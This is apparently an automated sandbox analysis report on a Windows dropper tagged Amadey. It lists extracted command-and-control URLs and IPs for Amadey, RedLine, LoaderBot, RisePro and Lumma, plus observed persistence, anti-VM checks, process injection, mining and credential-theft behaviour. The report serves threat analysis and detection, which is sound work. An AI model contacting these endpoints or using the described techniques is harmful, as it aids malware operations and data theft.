amadey | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
150s
max time network
1803s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
24-06-2024 00:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

amadey

Version

4.31

Botnet

c43c2d

http://o7labs.top

Attributes

install_dir
28feeece5c
install_file
Hkbsse.exe
strings_key
db4823e211dffb31faf4fc1fd90d3289
url_paths
/online/support/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Extracted

Family

loaderbot

https://cv99160.tw1.ru/cmd.php

Extracted

Family

risepro

77.91.77.66:58709

Extracted

Family

lumma

https://disappointcredisotw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Gh0st RAT payload 7 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3472-124-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat
behavioral2/memory/3472-123-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat
behavioral2/memory/5088-148-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat
behavioral2/memory/5088-149-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat
behavioral2/memory/1164-200-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat
behavioral2/memory/1164-201-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat
behavioral2/memory/1164-204-0x0000000010000000-0x0000000010362000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\ama.exe	family_redline
behavioral2/memory/2216-51-0x0000000000D00000-0x0000000000D50000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

limba.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ limba.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	limba.exe

LoaderBot executable 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe	loaderbot
behavioral2/memory/4988-98-0x0000000000220000-0x000000000061E000-memory.dmp	loaderbot

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/404-168-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-169-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-171-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-170-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-167-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-165-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-163-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/404-209-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/4496-2371-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/4496-20919-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/7544-628232-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1936	powershell.exe
1556	powershell.exe
7564	powershell.exe
12864	powershell.exe
5900	powershell.exe
9072	powershell.exe
9004	powershell.exe
15324	powershell.exe
9516	powershell.exe
660	powershell.exe
7700	powershell.exe
5428	powershell.exe
7616	powershell.exe
5012	powershell.exe
7260	powershell.exe
7564	powershell.exe
9004	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

limba.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	limba.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	limba.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

ama.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation ama.exe
Drops startup file 1 IoCs

Processes:

yondex.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url yondex.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation	ama.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	yondex.exe

Executes dropped EXE 30 IoCs

Processes:

0x3fg.exeHkbsse.exesetup.exeuYtF.exesetup.exeHkbsse.exetaskweaker.exeama.exesetup222.exeFirstZ.exepic1.exerolex.exeyondex.exeSetupWizard.exeSetupWizard.exesvchost.exeJufrxnb.exeJufrxnb.exewfbrmcwrltkl.exeDriver.exeJufrxnb.exewinsvc.exepic15.exelimba.exeChatLife.exe1.exegui.exe6.exeHkbsse.exereakuqnanrkn.exe

pid	process
192	0x3fg.exe
3620	Hkbsse.exe
216	setup.exe
3532	uYtF.exe
4620	setup.exe
4664	Hkbsse.exe
4564	taskweaker.exe
2216	ama.exe
2868	setup222.exe
1444	FirstZ.exe
696	pic1.exe
2068	rolex.exe
4988	yondex.exe
3868	SetupWizard.exe
2196	SetupWizard.exe
3472	svchost.exe
420	Jufrxnb.exe
5088	Jufrxnb.exe
3556	wfbrmcwrltkl.exe
4496	Driver.exe
1164	Jufrxnb.exe
5072	winsvc.exe
900	pic15.exe
2424	limba.exe
1116	ChatLife.exe
4340	1.exe
696	gui.exe
7992	6.exe
7476	Hkbsse.exe
10200	reakuqnanrkn.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\limba.exe	themida
behavioral2/memory/2424-217-0x0000000000400000-0x0000000000983000-memory.dmp	themida
behavioral2/memory/2424-220-0x0000000000400000-0x0000000000983000-memory.dmp	themida
behavioral2/memory/2424-218-0x0000000000400000-0x0000000000983000-memory.dmp	themida
behavioral2/memory/2424-219-0x0000000000400000-0x0000000000983000-memory.dmp	themida
behavioral2/memory/2424-2374-0x0000000000400000-0x0000000000983000-memory.dmp	themida

UPX packed file 22 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3472-124-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/3472-123-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/3472-121-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/5088-145-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/5088-148-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/5088-149-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/404-155-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-161-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-168-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-169-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-171-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-170-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-167-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-165-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-163-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-162-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-158-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/404-156-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/1164-200-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/1164-201-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/1164-204-0x0000000010000000-0x0000000010362000-memory.dmp	upx
behavioral2/memory/404-209-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

yondex.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\yondex.exe"	yondex.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

limba.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA limba.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	limba.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Jufrxnb.exe

description	ioc	process
File opened (read-only)	\??\X:	Jufrxnb.exe
File opened (read-only)	\??\L:	Jufrxnb.exe
File opened (read-only)	\??\P:	Jufrxnb.exe
File opened (read-only)	\??\V:	Jufrxnb.exe
File opened (read-only)	\??\U:	Jufrxnb.exe
File opened (read-only)	\??\Y:	Jufrxnb.exe
File opened (read-only)	\??\Z:	Jufrxnb.exe
File opened (read-only)	\??\G:	Jufrxnb.exe
File opened (read-only)	\??\K:	Jufrxnb.exe
File opened (read-only)	\??\T:	Jufrxnb.exe
File opened (read-only)	\??\W:	Jufrxnb.exe
File opened (read-only)	\??\B:	Jufrxnb.exe
File opened (read-only)	\??\N:	Jufrxnb.exe
File opened (read-only)	\??\O:	Jufrxnb.exe
File opened (read-only)	\??\J:	Jufrxnb.exe
File opened (read-only)	\??\M:	Jufrxnb.exe
File opened (read-only)	\??\Q:	Jufrxnb.exe
File opened (read-only)	\??\R:	Jufrxnb.exe
File opened (read-only)	\??\S:	Jufrxnb.exe
File opened (read-only)	\??\E:	Jufrxnb.exe
File opened (read-only)	\??\H:	Jufrxnb.exe
File opened (read-only)	\??\I:	Jufrxnb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

68 raw.githubusercontent.com
69 raw.githubusercontent.com

flow	ioc
68	raw.githubusercontent.com
69	raw.githubusercontent.com

Power Settings 1 TTPs 17 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	process
2732	powercfg.exe
4348	powercfg.exe
7728	powercfg.exe
2784	powercfg.exe
1940	powercfg.exe
6528	powercfg.exe
9752	powercfg.exe
11156	powercfg.exe
10508	powercfg.exe
4540	powercfg.exe
4768	powercfg.exe
4904	powercfg.exe
7036	powercfg.exe
15544	powercfg.exe
14172	powercfg.exe
424	powercfg.exe
11088	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

setup.exeFirstZ.exe

description	ioc	process
File opened for modification	C:\Windows\System32\.coE4BE.tmp	setup.exe
File opened for modification	C:\Windows\system32\.coE4BE.tmp	setup.exe
File opened for modification	C:\Windows\system32\winsvc.exe	setup.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

wfbrmcwrltkl.exetaskweaker.exepic15.exe

description	pid	process	target process
PID 3556 set thread context of 404	3556	wfbrmcwrltkl.exe	explorer.exe
PID 4564 set thread context of 2252	4564	taskweaker.exe	BitLockerToGo.exe
PID 900 set thread context of 7968	900	pic15.exe	BitLockerToGo.exe

Drops file in Program Files directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe	svchost.exe

Drops file in Windows directory 5 IoCs

Processes:

0x3fg.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\Tasks\Hkbsse.job	0x3fg.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe

Launches sc.exe 17 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
6584	sc.exe
11048	sc.exe
4636	sc.exe
5616	sc.exe
4560	sc.exe
2412	sc.exe
10880	sc.exe
5936	sc.exe
3704	sc.exe
4972	sc.exe
7892	sc.exe
7132	sc.exe
10140	sc.exe
9348	sc.exe
5048	sc.exe
10956	sc.exe
8472	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3128 4340 WerFault.exe 1.exe

pid	pid_target	process	target process
3128	4340	WerFault.exe	1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Jufrxnb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Jufrxnb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	Jufrxnb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	Jufrxnb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Jufrxnb.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

13764 taskkill.exe
19592 taskkill.exe
18932 taskkill.exe
19536 taskkill.exe

pid	process
13764	taskkill.exe
19592	taskkill.exe
18932	taskkill.exe
19536	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdgeCP.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exeJufrxnb.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum	Jufrxnb.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7"	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	Jufrxnb.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 08da27bad1c5da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
